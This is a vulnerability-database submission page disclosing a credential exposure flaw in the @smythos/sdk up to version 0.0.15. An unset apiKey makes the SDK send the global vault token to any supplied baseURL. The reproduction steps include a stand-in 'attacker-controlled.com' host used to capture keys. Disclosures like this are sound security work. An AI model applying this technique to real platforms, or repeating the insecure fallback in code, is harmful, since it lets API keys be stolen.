Submeter #797642: smythos sdk <= 0.0.15 Credential Exposure / Information Disclosure (CWE-200)informação

Título	smythos sdk <= 0.0.15 Credential Exposure / Information Disclosure (CWE-200)
Descrição	# Technical Details An insecure credential fallback mechanism in the `@smythos/sdk` allows an internal or external attacker to stealthily steal highly sensitive system Vault API keys. If the SDK is initialized with an attacker-controlled `baseURL` and no credentials are explicitly provided, the framework automatically attaches the system's global Vault token (e.g., OpenAI or Anthropic keys) and sends it directly to the attacker's server. # Vulnerable Code File: packages/sdk/src/LLM/utils.ts Method: adaptModelParams Why: If the user omits the `credentials` or `apiKey` parameter, the function executes a "silent fallback" by aggressively setting the credentials array to `['vault']`. When `['vault']` is requested by the connector service upon request execution, the SRE environment (`ConnectorService.getVaultConnector()`) resolves it against the system-level `JSONFileVault` (typically loaded from `~/.smyth/vault.json`). This extraction completely bypasses any user origin or destination trust checks. # Reproduction 1. Start an attacker server using express.js to intercept the API Key and log the `Authorization` header. 2. Initialize SRE Environment (`SRE.init()`) in a Node application that has access to the global vault configuration. 3. The attacker creates an LLM model pointing to their own server by supplying an external target via `baseURL: "http://attacker-controlled.com/v1"` without specifying an `apiKey`. 4. Trigger the LLM prompt. The SDK automatically attaches the Platform Vault Key and sends it to the attacker's server. # Impact - Critical exposure of Sensitive Information (Vault API Keys) to an Unauthorized Actor. - Any multi-tenant platform integrating `@smythos/sdk` (where tenants can define a custom `baseURL`) is susceptible to comprehensive API key theft. - Leads to severe financial loss due to unauthorized global LLM usage and provides a pivot for deeper organizational compromise.
Fonte	⚠️ https://gist.github.com/YLChen-007/3d35e0ce8197989ee4de4a93def30d47
Utilizador	Eric-b (UID 96354)
Submissão	06/04/2026 05h49 (há 21 dias)
Moderação	25/04/2026 15h52 (19 days later)
Estado	Aceite
Entrada VulDB	359600 [SmythOS sre até 0.0.15 Connector Service utils.ts baseURL Divulgação de Informação]
Pontos	20

◂ Voltar Visão Geral Próximo ▸

Might our Artificial Intelligence support you?

Check our Alexa App!